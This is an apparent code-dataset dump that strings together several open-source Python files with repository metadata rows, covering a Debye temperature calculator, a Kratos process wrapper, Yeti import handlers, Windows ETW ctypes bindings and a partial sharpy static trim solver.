Gamma[1, 2] = dc[0] ** 2 * C[4, 5] + dc[1] ** 2 * C[1, 3] + dc[2] ** 2 * C[2, 3]
Gamma[1, 2] += dc[1] * dc[2] * (C[3, 3] + C[1, 2]) + dc[2] * dc[0] * (
C[2, 5] + C[3, 4]
)
Gamma[1, 2] += dc[0] * dc[1] * (C[1, 4] + C[3, 5])
Gamma[1, 0] = Gamma[0, 1]
Gamma[2, 0] = Gamma[0, 2]
Gamma[2, 1] = Gamma[1, 2]
return Gamma
def spherical_integral(C, rho):
"""
Integrate the sum of 1/v_i**3 over all propagation directions on the unit sphere.
"""
# phi - azimuthal angle (angle in the xy-plane)
# theta - polar angle (angle measured from the z-axis)
# dblquad passes arguments as (y, x); here y = theta and x = phi
def func(theta, phi, C, rho): # integrand: sum of 1/v_i**3 over the three acoustic branches
x = sp.cos(phi) * sp.sin(theta)
y = sp.sin(phi) * sp.sin(theta)
z = sp.cos(theta)
dc = sp.array((x, y, z)) # components of a unit vector are its direction cosines
Gamma = make_gamma(dc, C)
rho_c_square = linalg.eigvals(Gamma).real # GPa
rho_c_square = rho_c_square * 1e9 # Pa
sound_vel = sp.sqrt(rho_c_square / rho) # m/s
integrand = (
1 / (sound_vel[0] ** 3) + 1 / (sound_vel[1] ** 3) + 1 / (sound_vel[2] ** 3)
)
return integrand * sp.sin(theta)
# dblquad integrates func(y, x): theta is the inner (first) argument, phi the outer
integral, error = dblquad(
func, 0, 2 * sp.pi, lambda g: 0, lambda h: sp.pi, args=(C, rho)
)
return integral
def main(argv):
C = read_file.read_file(argv[0])
C.pop(0)
C = sp.array(C, float)
density, natoms, molmass = read_file.read_file(argv[1])[0]
density = float(density) # kg/m**3
natoms = int(natoms)
molmass = float(molmass) # kg/mol
integral = spherical_integral(C, density) # (s/m)**3
mean_vel = (integral / 12.0 / sp.pi) ** (-1 / 3.0)
debye_temp = (
PLANCKCONST
/ BOLTZCONST
* (3.0 * natoms * AVONUM * density / 4.0 / sp.pi / molmass) ** (1 / 3.0)
* mean_vel
)
print(debye_temp, mean_vel)
if __name__ == "__main__":
main(sys.argv[1:])
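# Hedged sketch (not part of the original file): evaluate the spherical average
# for a hypothetical cubic crystal without the read_file inputs; all numbers
# below are illustrative, not real material data.
def _example_cubic():
    C11, C12, C44 = 250.0, 150.0, 50.0  # GPa, made-up elastic constants
    C = sp.zeros((6, 6))
    C[0, 0] = C[1, 1] = C[2, 2] = C11
    C[0, 1] = C[0, 2] = C[1, 2] = C12
    C[1, 0] = C[2, 0] = C[2, 1] = C12
    C[3, 3] = C[4, 4] = C[5, 5] = C44
    rho = 5000.0  # kg/m**3, made-up density
    integral = spherical_integral(C, rho)  # (s/m)**3
    return (integral / 12.0 / sp.pi) ** (-1.0 / 3.0)  # mean sound velocity, m/s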
|
81624711778434057781b0d27575ff3b97abc81e
|
56a77194fc0cd6087b0c2ca1fb6dc0de64b8a58a
|
/kratos/python_scripts/check_same_model_part_using_skin_process.py
|
73b2253342ca25484b024f83a3de8f1a8e12dc36
|
[
"BSD-3-Clause"
] |
permissive
|
KratosMultiphysics/Kratos
|
82b902a2266625b25f17239b42da958611a4b9c5
|
366949ec4e3651702edc6ac3061d2988f10dd271
|
refs/heads/master
| 2023-08-30T20:31:37.818693
| 2023-08-30T18:01:01
| 2023-08-30T18:01:01
| 81,815,495
| 994
| 285
|
NOASSERTION
| 2023-09-14T13:22:43
| 2017-02-13T10:58:24
|
C++
|
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
check_same_model_part_using_skin_process.py
|
# Importing the Kratos Library
import KratosMultiphysics
def Factory(settings, model):
if not isinstance(settings, KratosMultiphysics.Parameters):
raise Exception("expected input shall be a Parameters object, encapsulating a json string")
return CheckSameModelPartUsingSkinDistanceProcess(model, settings["Parameters"])
class CheckSameModelPartUsingSkinDistanceProcess(KratosMultiphysics.Process):
"""This process checks that the model part is the same using the skin distance
Only the member variables listed below should be accessed directly.
Public member variables:
Model -- the container of the different model parts.
settings -- Kratos parameters containing solver settings.
"""
def __init__(self, model, settings):
""" The default constructor of the class
Keyword arguments:
self -- It signifies an instance of a class.
model -- the container of the different model parts.
settings -- Kratos parameters containing solver settings.
"""
KratosMultiphysics.Process.__init__(self)
# Assigning values
self.model = model
# Create the process
self.process = KratosMultiphysics.CheckSameModelPartUsingSkinDistanceProcess3D(self.model, settings)
def ExecuteBeforeSolutionLoop(self):
"""This method is executed in before initialize the solution step
Keyword arguments:
self -- It signifies an instance of a class.
"""
self.process.Execute()
|
ee3157ac5d0cea57be26acbb190f86a384b4fbae
|
ab5d1586266e525eb32823851dd3c774b60fabec
|
/plugins/import_methods/text.py
|
c6fa970c9c561715225ec625fad1a7c8384478bb
|
[
"Apache-2.0"
] |
permissive
|
yeti-platform/yeti
|
d31fa464582b6d6731a437d7ceab9e730ce09c75
|
dccc691d48177f921ef1134c8fd22f064dc085a2
|
refs/heads/master
| 2023-09-01T13:54:19.258408
| 2023-06-29T12:44:55
| 2023-06-29T12:44:55
| 47,927,876
| 1,444
| 321
|
Apache-2.0
| 2023-09-12T14:49:55
| 2015-12-13T16:54:26
|
Python
|
UTF-8
|
Python
| false
| false
| 656
|
py
|
text.py
|
from core.investigation import ImportMethod
class ImportText(ImportMethod):
def do_import(self, results, filepath):
with open(filepath, "r") as f:
content = f.read()
results.investigation.update(import_text=content)
class ImportTextPlain(ImportText):
default_values = {
"name": "import_text",
"description": "Perform investigation import from a text document.",
"acts_on": "text/plain",
}
class ImportXML(ImportText):
default_values = {
"name": "import_xml",
"description": "Perform investigation import from an XML document.",
"acts_on": "text/xml",
}
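# Hedged sketch (not part of the original file): following the pattern above, a
# hypothetical handler for a new MIME type only needs different default_values.
class ImportCSV(ImportText):
    default_values = {
        "name": "import_csv",
        "description": "Perform investigation import from a CSV document.",
        "acts_on": "text/csv",
    }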
|
1d6b67f0be0fb43647bee2d523d942fd51e7a8b1
|
2ddbcefa36bf68ad2e7f4018c5283b7aef726a1f
|
/etw/evntrace.py
|
287cacf1b4fd5b9f4153fa24d3d698813838fa97
|
[
"Apache-2.0"
] |
permissive
|
fireeye/pywintrace
|
c275ba90f8ec942a4ff2f03fb700c562859e5f25
|
977eeb85d08982c160d9594f5f875f54db7a3415
|
refs/heads/master
| 2023-08-16T14:29:28.361857
| 2023-03-23T18:41:16
| 2023-03-23T18:41:16
| 102,869,990
| 273
| 73
|
Apache-2.0
| 2023-03-23T18:41:18
| 2017-09-08T14:27:01
|
Python
|
UTF-8
|
Python
| false
| false
| 11,529
|
py
|
evntrace.py
|
########################################################################
# Copyright 2017 FireEye Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
########################################################################
import ctypes as ct
import ctypes.wintypes as wt
from etw.GUID import GUID
from etw import evntcons as ec
from etw import evntprov as ep
from etw.common import TIME_ZONE_INFORMATION
from etw.wmistr import WNODE_HEADER
KERNEL_LOGGER_NAME = "NT Kernel Logger"
KERNEL_LOGGER_NAME_LOWER = "nt kernel logger"
ENABLE_TRACE_PARAMETERS_VERSION = 1
ENABLE_TRACE_PARAMETERS_VERSION_2 = 2
EVENT_TRACE_FLAG_PROCESS = 0x00000001
EVENT_TRACE_FLAG_THREAD = 0x00000002
EVENT_TRACE_FLAG_IMAGE_LOAD = 0x00000004
EVENT_TRACE_FLAG_PROCESS_COUNTERS = 0x00000008
EVENT_TRACE_FLAG_CSWITCH = 0x00000010
EVENT_TRACE_FLAG_DPC = 0x00000020
EVENT_TRACE_FLAG_INTERRUPT = 0x00000040
EVENT_TRACE_FLAG_SYSTEMCALL = 0x00000080
EVENT_TRACE_FLAG_DISK_IO = 0x00000100
EVENT_TRACE_FLAG_DISK_FILE_IO = 0x00000200
EVENT_TRACE_FLAG_DISK_IO_INIT = 0x00000400
EVENT_TRACE_FLAG_DISPATCHER = 0x00000800
EVENT_TRACE_FLAG_MEMORY_PAGE_FAULTS = 0x00001000
EVENT_TRACE_FLAG_MEMORY_HARD_FAULTS = 0x00002000
EVENT_TRACE_FLAG_VIRTUALALLOC = 0x00004000
EVENT_TRACE_FLAG_NETWORK_TCPIP = 0x00010000
EVENT_TRACE_FLAG_REGISTRY = 0x00020000
EVENT_TRACE_FLAG_DBGPRINT = 0x00040000
EVENT_TRACE_FLAG_ALPC = 0x00100000
EVENT_TRACE_FLAG_SPLIT_IO = 0x00200000
EVENT_TRACE_FLAG_DRIVER = 0x00800000
EVENT_TRACE_FLAG_PROFILE = 0x01000000
EVENT_TRACE_FLAG_FILE_IO = 0x02000000
EVENT_TRACE_FLAG_FILE_IO_INIT = 0x04000000
DEFAULT_NT_KERNEL_LOGGER_FLAGS = (EVENT_TRACE_FLAG_PROCESS |
EVENT_TRACE_FLAG_THREAD |
EVENT_TRACE_FLAG_DISK_IO |
EVENT_TRACE_FLAG_NETWORK_TCPIP)
# Remarkably, TRACEHANDLE is not typedef'd to a HANDLE, but, in fact, to a UINT64
TRACEHANDLE = ct.c_ulonglong
INVALID_PROCESSTRACE_HANDLE = TRACEHANDLE(-1)
# TRACE_LEVEL flags
TRACE_LEVEL_NONE = 0 # Tracing is not on
TRACE_LEVEL_CRITICAL = 1 # Abnormal exit or termination
TRACE_LEVEL_ERROR = 2 # Severe errors that need logging
TRACE_LEVEL_WARNING = 3 # Warnings such as allocation failure
TRACE_LEVEL_INFORMATION = 4 # Includes non-error cases(e.g.,Entry-Exit)
TRACE_LEVEL_VERBOSE = 5 # Detailed traces from intermediate steps
TRACE_LEVEL_RESERVED6 = 6
TRACE_LEVEL_RESERVED7 = 7
TRACE_LEVEL_RESERVED8 = 8
TRACE_LEVEL_RESERVED9 = 9
# EVENT_CONTROL flags
EVENT_CONTROL_CODE_DISABLE_PROVIDER = 0
EVENT_CONTROL_CODE_ENABLE_PROVIDER = 1
EVENT_CONTROL_CODE_CAPTURE_STATE = 2
# ControlTrace Codes
EVENT_TRACE_CONTROL_QUERY = 0
EVENT_TRACE_CONTROL_STOP = 1
EVENT_TRACE_CONTROL_UPDATE = 2
# Logger Mode flags
EVENT_TRACE_FILE_MODE_NONE = 0x00000000 # Logfile is off
EVENT_TRACE_FILE_MODE_SEQUENTIAL = 0x00000001 # Log sequentially
EVENT_TRACE_FILE_MODE_CIRCULAR = 0x00000002 # Log in circular manner
EVENT_TRACE_FILE_MODE_APPEND = 0x00000004 # Append sequential log
EVENT_TRACE_REAL_TIME_MODE = 0x00000100 # Real time mode on
EVENT_TRACE_DELAY_OPEN_FILE_MODE = 0x00000200 # Delay opening file
EVENT_TRACE_BUFFERING_MODE = 0x00000400 # Buffering mode only
EVENT_TRACE_PRIVATE_LOGGER_MODE = 0x00000800 # Process Private Logger
EVENT_TRACE_ADD_HEADER_MODE = 0x00001000 # Add a logfile header
EVENT_TRACE_USE_GLOBAL_SEQUENCE = 0x00004000 # Use global sequence no.
EVENT_TRACE_USE_LOCAL_SEQUENCE = 0x00008000 # Use local sequence no.
EVENT_TRACE_RELOG_MODE = 0x00010000 # Relogger
EVENT_TRACE_USE_PAGED_MEMORY = 0x01000000 # Use pageable buffers
# Logger Mode flags on XP and above
EVENT_TRACE_FILE_MODE_NEWFILE = 0x00000008 # Auto-switch log file
EVENT_TRACE_FILE_MODE_PREALLOCATE = 0x00000020 # Pre-allocate mode
# Logger Mode flags on Vista and above
EVENT_TRACE_NONSTOPPABLE_MODE = 0x00000040 # Session cannot be stopped (Autologger only)
EVENT_TRACE_SECURE_MODE = 0x00000080 # Secure session
EVENT_TRACE_USE_KBYTES_FOR_SIZE = 0x00002000 # Use KBytes as file size unit
EVENT_TRACE_PRIVATE_IN_PROC = 0x00020000 # In process private logger
EVENT_TRACE_MODE_RESERVED = 0x00100000 # Reserved bit, used to signal Heap/Critsec tracing
# Logger Mode flags on Win7 and above
EVENT_TRACE_NO_PER_PROCESSOR_BUFFERING = 0x10000000 # Use this for low frequency sessions.
# Logger Mode flags on Win8 and above
EVENT_TRACE_SYSTEM_LOGGER_MODE = 0x02000000 # Receive events from SystemTraceProvider
EVENT_TRACE_ADDTO_TRIAGE_DUMP = 0x80000000 # Add ETW buffers to triage dumps
EVENT_TRACE_STOP_ON_HYBRID_SHUTDOWN = 0x00400000 # Stop on hybrid shutdown
EVENT_TRACE_PERSIST_ON_HYBRID_SHUTDOWN = 0x00800000 # Persist on hybrid shutdown
# Logger Mode flags on Blue and above
EVENT_TRACE_INDEPENDENT_SESSION_MODE = 0x08000000 # Independent logger session
class ENABLE_TRACE_PARAMETERS(ct.Structure):
_fields_ = [('Version', ct.c_ulong),
('EnableProperty', ct.c_ulong),
('ControlFlags', ct.c_ulong),
('SourceId', GUID),
('EnableFilterDesc', ct.POINTER(ep.EVENT_FILTER_DESCRIPTOR)),
('FilterDescCount', ct.c_ulong)]
class EVENT_TRACE_PROPERTIES(ct.Structure):
_fields_ = [('Wnode', WNODE_HEADER),
('BufferSize', ct.c_ulong),
('MinimumBuffers', ct.c_ulong),
('MaximumBuffers', ct.c_ulong),
('MaximumFileSize', ct.c_ulong),
('LogFileMode', ct.c_ulong),
('FlushTimer', ct.c_ulong),
('EnableFlags', ct.c_ulong),
('AgeLimit', ct.c_ulong),
('NumberOfBuffers', ct.c_ulong),
('FreeBuffers', ct.c_ulong),
('EventsLost', ct.c_ulong),
('BuffersWritten', ct.c_ulong),
('LogBuffersLost', ct.c_ulong),
('RealTimeBuffersLost', ct.c_ulong),
('LoggerThreadId', wt.HANDLE),
('LogFileNameOffset', ct.c_ulong),
('LoggerNameOffset', ct.c_ulong)]
# This is a structure defined in a union within EVENT_TRACE_HEADER
class EVENT_TRACE_HEADER_CLASS(ct.Structure):
_fields_ = [('Type', ct.c_ubyte),
('Level', ct.c_ubyte),
('Version', ct.c_uint16)]
class EVENT_TRACE_HEADER(ct.Structure):
_fields_ = [('Size', ct.c_ushort),
('HeaderType', ct.c_ubyte),
('MarkerFlags', ct.c_ubyte),
('Class', EVENT_TRACE_HEADER_CLASS),
('ThreadId', ct.c_ulong),
('ProcessId', ct.c_ulong),
('TimeStamp', wt.LARGE_INTEGER),
('Guid', GUID),
('ClientContext', ct.c_ulong),
('Flags', ct.c_ulong)]
class EVENT_TRACE(ct.Structure):
_fields_ = [('Header', EVENT_TRACE_HEADER),
('InstanceId', ct.c_ulong),
('ParentInstanceId', ct.c_ulong),
('ParentGuid', GUID),
('MofData', ct.c_void_p),
('MofLength', ct.c_ulong),
('ClientContext', ct.c_ulong)]
class TRACE_LOGFILE_HEADER(ct.Structure):
_fields_ = [('BufferSize', ct.c_ulong),
('MajorVersion', ct.c_byte),
('MinorVersion', ct.c_byte),
('SubVersion', ct.c_byte),
('SubMinorVersion', ct.c_byte),
('ProviderVersion', ct.c_ulong),
('NumberOfProcessors', ct.c_ulong),
('EndTime', wt.LARGE_INTEGER),
('TimerResolution', ct.c_ulong),
('MaximumFileSize', ct.c_ulong),
('LogFileMode', ct.c_ulong),
('BuffersWritten', ct.c_ulong),
('StartBuffers', ct.c_ulong),
('PointerSize', ct.c_ulong),
('EventsLost', ct.c_ulong),
('CpuSpeedInMHz', ct.c_ulong),
('LoggerName', ct.c_wchar_p),
('LogFileName', ct.c_wchar_p),
('TimeZone', TIME_ZONE_INFORMATION),
('BootTime', wt.LARGE_INTEGER),
('PerfFreq', wt.LARGE_INTEGER),
('StartTime', wt.LARGE_INTEGER),
('ReservedFlags', ct.c_ulong),
('BuffersLost', ct.c_ulong)]
# This must be "forward declared", because of the callback type below,
# which is contained in the ct.Structure.
class EVENT_TRACE_LOGFILE(ct.Structure):
pass
# The type for event trace callbacks.
EVENT_RECORD_CALLBACK = ct.WINFUNCTYPE(None, ct.POINTER(ec.EVENT_RECORD))
EVENT_TRACE_BUFFER_CALLBACK = ct.WINFUNCTYPE(ct.c_ulong,
ct.POINTER(EVENT_TRACE_LOGFILE))
EVENT_TRACE_LOGFILE._fields_ = [
('LogFileName', ct.c_wchar_p),
('LoggerName', ct.c_wchar_p),
('CurrentTime', ct.c_longlong),
('BuffersRead', ct.c_ulong),
('ProcessTraceMode', ct.c_ulong),
('CurrentEvent', EVENT_TRACE),
('LogfileHeader', TRACE_LOGFILE_HEADER),
('BufferCallback', EVENT_TRACE_BUFFER_CALLBACK),
('BufferSize', ct.c_ulong),
('Filled', ct.c_ulong),
('EventsLost', ct.c_ulong),
('EventRecordCallback', EVENT_RECORD_CALLBACK),
('IsKernelTrace', ct.c_ulong),
('Context', ct.c_void_p)]
# Function Definitions
StartTraceW = ct.windll.advapi32.StartTraceW
StartTraceW.argtypes = [ct.POINTER(TRACEHANDLE),
ct.c_wchar_p,
ct.POINTER(EVENT_TRACE_PROPERTIES)]
StartTraceW.restype = ct.c_ulong
ControlTraceW = ct.windll.advapi32.ControlTraceW
ControlTraceW.argtypes = [TRACEHANDLE,
ct.c_wchar_p,
ct.POINTER(EVENT_TRACE_PROPERTIES),
ct.c_ulong]
ControlTraceW.restype = ct.c_ulong
# TODO: Ensure we are using the correct library based on the version of Windows.
EnableTraceEx2 = ct.windll.advapi32.EnableTraceEx2
EnableTraceEx2.argtypes = [TRACEHANDLE,
ct.POINTER(GUID),
ct.c_ulong,
ct.c_char,
ct.c_ulonglong,
ct.c_ulonglong,
ct.c_ulong,
ct.POINTER(ENABLE_TRACE_PARAMETERS)]
EnableTraceEx2.restype = ct.c_ulong
OpenTraceW = ct.windll.advapi32.OpenTraceW
OpenTraceW.argtypes = [ct.POINTER(EVENT_TRACE_LOGFILE)]
OpenTraceW.restype = TRACEHANDLE
ProcessTrace = ct.windll.advapi32.ProcessTrace
ProcessTrace.argtypes = [ct.POINTER(TRACEHANDLE),
ct.c_ulong,
ct.POINTER(wt.FILETIME),
ct.POINTER(wt.FILETIME)]
ProcessTrace.restype = ct.c_ulong
CloseTrace = ct.windll.advapi32.CloseTrace
CloseTrace.argtypes = [TRACEHANDLE]
CloseTrace.restype = ct.c_ulong
ConvertSidToStringSidW = ct.windll.advapi32.ConvertSidToStringSidW
ConvertSidToStringSidW.argtypes = [ct.c_void_p, ct.POINTER(wt.LPWSTR)]
ConvertSidToStringSidW.restype = wt.BOOL
LocalFree = ct.windll.kernel32.LocalFree
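# Hedged usage sketch (not part of the original file): one typical way the
# definitions above are combined to start a real-time session. Buffer sizing,
# flags and the session name are illustrative; real callers also populate
# Wnode flags (e.g. WNODE_FLAG_TRACED_GUID from wmistr.h) before the call.
def _example_start_session(session_name='ExampleSession'):
    # the properties buffer must leave room for the logger name after the struct
    props_len = ct.sizeof(EVENT_TRACE_PROPERTIES) + 2 * 1024
    buf = (ct.c_char * props_len)()
    props = ct.cast(buf, ct.POINTER(EVENT_TRACE_PROPERTIES))
    props.contents.Wnode.BufferSize = props_len
    props.contents.LogFileMode = EVENT_TRACE_REAL_TIME_MODE
    props.contents.LoggerNameOffset = ct.sizeof(EVENT_TRACE_PROPERTIES)
    handle = TRACEHANDLE()
    status = StartTraceW(ct.byref(handle), session_name, props)
    return status, handle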
|
39b88c7152e737482fc1cb23a932a1f92ef49d6e
|
26060f5ea4d7efee2d03cbbd0b49c099e0f5f38a
|
/sharpy/solvers/statictrim.py
|
a76947edf9771d55097c6c677e14ecfdf24614a2
|
[
"BSD-3-Clause"
] |
permissive
|
ImperialCollegeLondon/sharpy
|
0fcd1fba9ed2181dabc1124f9800aa75521bfc3d
|
58ddceb985bef13af3ea199a1764c8dc9b088907
|
refs/heads/main
| 2023-08-19T03:04:26.044857
| 2023-07-17T07:05:06
| 2023-07-17T07:05:06
| 70,235,936
| 106
| 55
|
BSD-3-Clause
| 2023-08-16T02:27:58
| 2016-10-07T10:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 16,991
|
py
|
statictrim.py
|
import numpy as np
import sharpy.utils.cout_utils as cout
import sharpy.utils.solver_interface as solver_interface
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings_utils
import os
@solver
class StaticTrim(BaseSolver):
"""
The ``StaticTrim`` solver determines the longitudinal state of trim (equilibrium) for an aeroelastic system in
static conditions. It wraps around the desired solver to yield the state of trim of the system, in most cases
the :class:`~sharpy.solvers.staticcoupled.StaticCoupled` solver.
It calculates the angle of attack, elevator deflection and thrust required to achieve longitudinal
equilibrium. The output angles are shown in degrees.
The results from the trimming iteration can be saved to a text file by using the `save_info` option.
"""
solver_id = 'StaticTrim'
solver_classification = 'Flight Dynamics'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen'
settings_types['solver'] = 'str'
settings_default['solver'] = ''
settings_description['solver'] = 'Solver to run in trim routine'
settings_types['solver_settings'] = 'dict'
settings_default['solver_settings'] = dict()
settings_description['solver_settings'] = 'Solver settings dictionary'
settings_types['max_iter'] = 'int'
settings_default['max_iter'] = 100
settings_description['max_iter'] = 'Maximum number of iterations of trim routine'
settings_types['fz_tolerance'] = 'float'
settings_default['fz_tolerance'] = 0.01
settings_description['fz_tolerance'] = 'Tolerance in vertical force'
settings_types['fx_tolerance'] = 'float'
settings_default['fx_tolerance'] = 0.01
settings_description['fx_tolerance'] = 'Tolerance in horizontal force'
settings_types['m_tolerance'] = 'float'
settings_default['m_tolerance'] = 0.01
settings_description['m_tolerance'] = 'Tolerance in pitching moment'
settings_types['tail_cs_index'] = ['int', 'list(int)']
settings_default['tail_cs_index'] = 0
settings_description['tail_cs_index'] = 'Index of control surfaces that move to achieve trim'
settings_types['thrust_nodes'] = 'list(int)'
settings_default['thrust_nodes'] = [0]
settings_description['thrust_nodes'] = 'Nodes at which thrust is applied'
settings_types['initial_alpha'] = 'float'
settings_default['initial_alpha'] = 0.
settings_description['initial_alpha'] = 'Initial angle of attack'
settings_types['initial_deflection'] = 'float'
settings_default['initial_deflection'] = 0.
settings_description['initial_deflection'] = 'Initial control surface deflection'
settings_types['initial_thrust'] = 'float'
settings_default['initial_thrust'] = 0.0
settings_description['initial_thrust'] = 'Initial thrust setting'
settings_types['initial_angle_eps'] = 'float'
settings_default['initial_angle_eps'] = 0.05
settings_description['initial_angle_eps'] = 'Initial change of control surface deflection'
settings_types['initial_thrust_eps'] = 'float'
settings_default['initial_thrust_eps'] = 2.
settings_description['initial_thrust_eps'] = 'Initial thrust setting change'
settings_types['relaxation_factor'] = 'float'
settings_default['relaxation_factor'] = 0.2
settings_description['relaxation_factor'] = 'Relaxation factor'
settings_types['save_info'] = 'bool'
settings_default['save_info'] = False
settings_description['save_info'] = 'Save trim results to text file'
settings_table = settings_utils.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.data = None
self.settings = None
self.solver = None
# The order is
# [0]: alpha/fz
# [1]: alpha + delta (gamma)/moment
# [2]: thrust/fx
self.n_input = 3
self.i_iter = 0
self.input_history = []
self.output_history = []
self.gradient_history = []
self.trimmed_values = np.zeros((3,))
self.table = None
self.folder = None
def initialise(self, data, restart=False):
self.data = data
self.settings = data.settings[self.solver_id]
settings_utils.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.solver = solver_interface.initialise_solver(self.settings['solver'])
self.solver.initialise(self.data, self.settings['solver_settings'], restart=restart)
self.folder = data.output_folder + '/statictrim/'
if not os.path.exists(self.folder):
os.makedirs(self.folder)
self.table = cout.TablePrinter(10, 8, ['g', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f'],
filename=self.folder+'trim_iterations.txt')
self.table.print_header(['iter', 'alpha[deg]', 'elev[deg]', 'thrust', 'Fx', 'Fy', 'Fz', 'Mx', 'My', 'Mz'])
def increase_ts(self):
# NB: structural_solver/aero_solver are not attributes of StaticTrim itself;
# this method assumes the context of the wrapped coupled solver.
self.data.ts += 1
self.structural_solver.next_step()
self.aero_solver.next_step()
def run(self, **kwargs):
# In the event the modal solver has been run prior to StaticCoupled (i.e. to get undeformed modes), copy
# results and then attach to the resulting timestep
try:
modal = self.data.structure.timestep_info[-1].modal.copy()
modal_exists = True
except AttributeError:
modal_exists = False
self.trim_algorithm()
if modal_exists:
self.data.structure.timestep_info[-1].modal = modal
if self.settings['save_info']:
np.savetxt(self.folder + '/trim_values.txt', self.trimmed_values)
return self.data
def convergence(self, fz, m, fx):
return_value = np.array([False, False, False])
if np.abs(fz) < self.settings['fz_tolerance']:
return_value[0] = True
if np.abs(m) < self.settings['m_tolerance']:
return_value[1] = True
if np.abs(fx) < self.settings['fx_tolerance']:
return_value[2] = True
return return_value
def trim_algorithm(self):
"""
Trim algorithm method
The trim condition is found iteratively.
Returns:
np.array: array of trim values for angle of attack, control surface deflection and thrust.
"""
for self.i_iter in range(self.settings['max_iter'] + 1):
if self.i_iter == self.settings['max_iter']:
raise Exception('The Trim routine reached max iterations without convergence!')
self.input_history.append([])
self.output_history.append([])
self.gradient_history.append([])
for i in range(self.n_input):
self.input_history[self.i_iter].append(0)
self.output_history[self.i_iter].append(0)
self.gradient_history[self.i_iter].append(0)
# the first iteration requires computing gradients
if not self.i_iter:
# add to input history the initial estimation
self.input_history[self.i_iter][0] = self.settings['initial_alpha']
self.input_history[self.i_iter][1] = (self.settings['initial_deflection'] +
self.settings['initial_alpha'])
self.input_history[self.i_iter][2] = self.settings['initial_thrust']
# compute output
(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2]) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
# check for convergence (in case initial values are ok)
if all(self.convergence(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2])):
self.trimmed_values = self.input_history[self.i_iter]
return
# compute gradients
# dfz/dalpha
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0] + self.settings['initial_angle_eps'],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
self.gradient_history[self.i_iter][0] = ((l - self.output_history[self.i_iter][0]) /
self.settings['initial_angle_eps'])
# dm/dgamma
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1] + self.settings['initial_angle_eps'],
self.input_history[self.i_iter][2])
self.gradient_history[self.i_iter][1] = ((m - self.output_history[self.i_iter][1]) /
self.settings['initial_angle_eps'])
# dfx/dthrust
(l, m, d) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2] +
self.settings['initial_thrust_eps'])
self.gradient_history[self.i_iter][2] = ((d - self.output_history[self.i_iter][2]) /
self.settings['initial_thrust_eps'])
continue
# if not all(np.isfinite(self.gradient_history[self.i_iter - 1]))
# now back to normal evaluation (not only the i_iter == 0 case)
# compute the next inputs with the previous gradients. Note that the
# per-channel convergence check below is currently disabled (always False),
# so every channel is updated on every iteration:
# convergence = self.convergence(self.output_history[self.i_iter - 1][0],
# self.output_history[self.i_iter - 1][1],
# self.output_history[self.i_iter - 1][2])
convergence = np.full((3, ), False)
if convergence[0]:
# fz is converged, don't change it
self.input_history[self.i_iter][0] = self.input_history[self.i_iter - 1][0]
self.gradient_history[self.i_iter][0] = self.gradient_history[self.i_iter - 1][0]
else:
self.input_history[self.i_iter][0] = (self.input_history[self.i_iter - 1][0] -
(self.output_history[self.i_iter - 1][0] /
self.gradient_history[self.i_iter - 1][0]))
if convergence[1]:
# m is converged, don't change it
self.input_history[self.i_iter][1] = self.input_history[self.i_iter - 1][1]
self.gradient_history[self.i_iter][1] = self.gradient_history[self.i_iter - 1][1]
else:
# compute next gamma with the previous gradient
self.input_history[self.i_iter][1] = (self.input_history[self.i_iter - 1][1] -
(self.output_history[self.i_iter - 1][1] /
self.gradient_history[self.i_iter - 1][1]))
if convergence[2]:
# fx is converged, don't change it
self.input_history[self.i_iter][2] = self.input_history[self.i_iter - 1][2]
self.gradient_history[self.i_iter][2] = self.gradient_history[self.i_iter - 1][2]
else:
# compute next gamma with the previous gradient
self.input_history[self.i_iter][2] = (self.input_history[self.i_iter - 1][2] -
(self.output_history[self.i_iter - 1][2] /
self.gradient_history[self.i_iter - 1][2]))
if self.settings['relaxation_factor']:
for i_dim in range(3):
# blend the new input with the previous iterate; the original expression
# used the new value in both terms, which made the relaxation a no-op
self.input_history[self.i_iter][i_dim] = (self.input_history[self.i_iter][i_dim]*(1 - self.settings['relaxation_factor']) +
self.input_history[self.i_iter - 1][i_dim]*self.settings['relaxation_factor'])
# evaluate
(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2]) = self.evaluate(self.input_history[self.i_iter][0],
self.input_history[self.i_iter][1],
self.input_history[self.i_iter][2])
if not convergence[0]:
self.gradient_history[self.i_iter][0] = ((self.output_history[self.i_iter][0] -
self.output_history[self.i_iter - 1][0]) /
(self.input_history[self.i_iter][0] -
self.input_history[self.i_iter - 1][0]))
if not convergence[1]:
self.gradient_history[self.i_iter][1] = ((self.output_history[self.i_iter][1] -
self.output_history[self.i_iter - 1][1]) /
(self.input_history[self.i_iter][1] -
self.input_history[self.i_iter - 1][1]))
if not convergence[2]:
self.gradient_history[self.i_iter][2] = ((self.output_history[self.i_iter][2] -
self.output_history[self.i_iter - 1][2]) /
(self.input_history[self.i_iter][2] -
self.input_history[self.i_iter - 1][2]))
# check convergence
convergence = self.convergence(self.output_history[self.i_iter][0],
self.output_history[self.i_iter][1],
self.output_history[self.i_iter][2])
if all(convergence):
self.trimmed_values = self.input_history[self.i_iter]
self.table.close_file()
return
def evaluate(self, alpha, deflection_gamma, thrust):
